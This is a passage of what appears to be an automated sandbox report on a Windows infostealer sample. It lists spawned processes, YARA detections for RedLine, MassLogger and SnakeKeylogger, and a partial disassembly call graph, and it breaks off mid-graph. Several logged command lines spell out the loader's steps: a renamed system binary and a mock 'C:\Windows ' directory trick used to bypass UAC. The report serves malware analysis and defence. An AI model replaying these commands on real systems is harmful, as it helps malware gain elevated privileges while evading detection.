                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                        Start time:01:05:32
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:01:05:32
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                        Start time:01:05:34
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:1'290'240 bytes
                                                                                                                                                                                                                        MD5 hash:BD3B960B1EFB321AF06FE54D1D30C855
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:01:05:35
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                                                                                                                        Imagebase:0x370000
                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:01:05:36
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'225'728 bytes
                                                                                                                                                                                                                        MD5 hash:1F7F4AE415948A1027E513F2D23B8A5B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                        Start time:01:05:38
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                        Start time:01:05:38
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                        File size:138'056 bytes
                                                                                                                                                                                                                        MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                        Start time:01:05:38
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                        File size:174'408 bytes
                                                                                                                                                                                                                        MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                        Start time:01:05:38
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                        File size:154'952 bytes
                                                                                                                                                                                                                        MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:01:05:38
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'348'608 bytes
                                                                                                                                                                                                                        MD5 hash:500275C60FCB5B035FD81A2BA2CB2073
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                        Start time:01:05:39
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                        Start time:01:05:41
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                        Start time:01:05:41
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\xpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                        Start time:01:05:41
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'242'624 bytes
                                                                                                                                                                                                                        MD5 hash:3117CDDE7FDB0851FDBCA3E7FDB7A142
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                        Start time:01:05:43
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:2'354'176 bytes
                                                                                                                                                                                                                        MD5 hash:6A2E9C13C2A578F9FC128F26D48FC3D7
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                        Start time:01:05:44
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'356'800 bytes
                                                                                                                                                                                                                        MD5 hash:5AF7A965937863A10C99D5EC19A974A5
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                        Start time:01:05:45
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'278'464 bytes
                                                                                                                                                                                                                        MD5 hash:7AE7553BA674284A076D19A633F7EFF0
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                        Start time:01:05:46
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'235'968 bytes
                                                                                                                                                                                                                        MD5 hash:93CC0F7EAE7D58C22855106B435E4B64
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                        Start time:01:05:47
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:1'150'976 bytes
                                                                                                                                                                                                                        MD5 hash:B5FDD433E07825BDB9C6B8F563B00FDE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                        Start time:01:05:48
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'141'248 bytes
                                                                                                                                                                                                                        MD5 hash:979F07784823EB9149D134FBAB0B4376
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                        Start time:01:05:50
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'846'784 bytes
                                                                                                                                                                                                                        MD5 hash:3F2AB6CB57E7A0604E4E19795A526BD3
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                        Start time:01:05:50
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'146'880 bytes
                                                                                                                                                                                                                        MD5 hash:9E84CEFC497519C8483A6623FAD6ED3D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                        Start time:01:05:52
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                        Start time:01:05:52
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                        Start time:01:05:52
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'455'616 bytes
                                                                                                                                                                                                                        MD5 hash:07D3656AD4DF3DADDEDA88F101DE735C
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                        Start time:01:05:53
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                        Start time:01:05:54
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'511'424 bytes
                                                                                                                                                                                                                        MD5 hash:A5F4C6CB650242AC4B9D281D7FB3AD95
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                        Start time:01:05:55
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'455'616 bytes
                                                                                                                                                                                                                        MD5 hash:ADFE5C8879C41AEA47D22E19AC1F0F44
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                        Start time:01:05:56
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\AgentService.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\AgentService.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'801'216 bytes
                                                                                                                                                                                                                        MD5 hash:11EB7B63D45B07D2E9811E4D818A0174
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                        Start time:01:05:56
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'303'552 bytes
                                                                                                                                                                                                                        MD5 hash:680F459932662444F71FD678EBDF4171
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:16.2%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:30.2%
                                                                                                                                                                                                                          Total number of Nodes:1642
                                                                                                                                                                                                                          Total number of Limit Nodes:19
                                                                                                                                                                                                                          execution_graph 32359 2b33e12 33912 2b14860 32359->33912 33913 2b14871 33912->33913 33914 2b14897 33913->33914 33915 2b148ae 33913->33915 33921 2b14bcc 33914->33921 33930 2b145a0 33915->33930 33918 2b148a4 33919 2b148df 33918->33919 33935 2b14530 33918->33935 33922 2b14bd9 33921->33922 33929 2b14c09 33921->33929 33924 2b14c02 33922->33924 33926 2b14be5 33922->33926 33927 2b145a0 11 API calls 33924->33927 33925 2b14bf3 33925->33918 33941 2b12c44 11 API calls 33926->33941 33927->33929 33942 2b144dc 33929->33942 33931 2b145a4 33930->33931 33932 2b145c8 33930->33932 33955 2b12c10 33931->33955 33932->33918 33934 2b145b1 33934->33918 33936 2b14534 33935->33936 33937 2b14544 33935->33937 33936->33937 33939 2b145a0 11 API calls 33936->33939 33938 2b14572 33937->33938 33940 2b12c2c 11 API calls 33937->33940 33938->33919 33939->33937 33940->33938 33941->33925 33943 2b144e2 33942->33943 33945 2b144fd 33942->33945 33943->33945 33946 2b12c2c 33943->33946 33945->33925 33947 2b12c3a 33946->33947 33949 2b12c30 33946->33949 33947->33945 33948 2b12d19 33954 2b12ce8 7 API calls 33948->33954 33949->33947 33949->33948 33953 2b16520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33949->33953 33952 2b12d3a 33952->33945 33953->33948 33954->33952 33956 2b12c27 33955->33956 33958 2b12c14 33955->33958 33956->33934 33957 2b12c1e 33957->33934 33958->33957 33959 2b12d19 33958->33959 33963 2b16520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33958->33963 33964 2b12ce8 7 API calls 33959->33964 33962 2b12d3a 33962->33934 33963->33959 33964->33962 33965 2b3c350 33968 2b2f7c8 33965->33968 33969 2b2f7d0 33968->33969 33969->33969 33970 2b2f7d7 33969->33970 36411 2b288b8 LoadLibraryW 33970->36411 33972 2b2f7f1 36416 2b12ee0 QueryPerformanceCounter 33972->36416 33974 2b2f7f6 33975 2b2f800 InetIsOffline 33974->33975 33976 2b2f80a 33975->33976 33977 2b2f81b 33975->33977 33978 2b14530 11 API calls 33976->33978 33979 2b14530 11 API calls 33977->33979 33980 2b2f819 33978->33980 33981 2b2f82a 33979->33981 33980->33981 33982 2b14860 11 API calls 33981->33982 33983 2b2f848 33982->33983 33984 2b2f850 33983->33984 36419 2b146d4 33984->36419 36421 2b28274 36411->36421 36413 2b288f1 36432 2b27d78 36413->36432 36417 2b12ef8 GetTickCount 36416->36417 36418 2b12eed 36416->36418 36417->33974 36418->33974 36420 2b146da 36419->36420 36422 2b14530 11 API calls 36421->36422 36423 2b28299 36422->36423 36446 2b2798c 36423->36446 36427 2b282b3 36428 2b282bb GetModuleHandleW GetProcAddress GetProcAddress 36427->36428 36429 2b282ee 36428->36429 36467 2b14500 36429->36467 36433 2b14530 11 API calls 36432->36433 36434 2b27d9d 36433->36434 36435 2b2798c 12 API calls 36434->36435 36436 2b27daa 36435->36436 36437 2b147ec 11 API calls 36436->36437 36438 2b27dba 36437->36438 36472 2b281cc 36438->36472 36441 2b28274 15 API calls 36442 2b27dd3 NtWriteVirtualMemory 36441->36442 36443 2b27dff 36442->36443 36444 2b14500 11 API calls 36443->36444 36445 2b27e0c FreeLibrary 36444->36445 36445->33972 36447 2b2799d 36446->36447 36448 2b14bcc 11 API calls 36447->36448 36451 2b279ad 36448->36451 36449 2b27a19 36452 2b147ec 36449->36452 36451->36449 36471 2b1babc CharNextA 36451->36471 36453 2b14851 36452->36453 36454 2b147f0 36452->36454 36455 2b14530 36454->36455 36456 2b147f8 36454->36456 36457 2b14544 36455->36457 36462 2b145a0 11 API calls 36455->36462 36456->36453 36459 2b14807 36456->36459 36460 2b14530 11 API calls 36456->36460 36458 2b14572 36457->36458 36463 2b12c2c 11 API calls 36457->36463 36458->36427 36461 2b145a0 11 API calls 36459->36461 36460->36459 36464 2b14821 36461->36464 36462->36457 36463->36458 36465 2b14530 11 API calls 36464->36465 36466 2b1484d 36465->36466 36466->36427 36468 2b14506 36467->36468 36469 2b1452c 36468->36469 36470 2b12c2c 11 API calls 36468->36470 36469->36413 36470->36468 36471->36451 36473 2b14530 11 API calls 36472->36473 36474 2b281ef 36473->36474 36475 2b2798c 12 API calls 36474->36475 36476 2b281fc 36475->36476 36477 2b28204 GetModuleHandleA 36476->36477 36478 2b28274 15 API calls 36477->36478 36479 2b28215 GetModuleHandleA 36478->36479 36480 2b28233 36479->36480 36481 2b144dc 11 API calls 36480->36481 36482 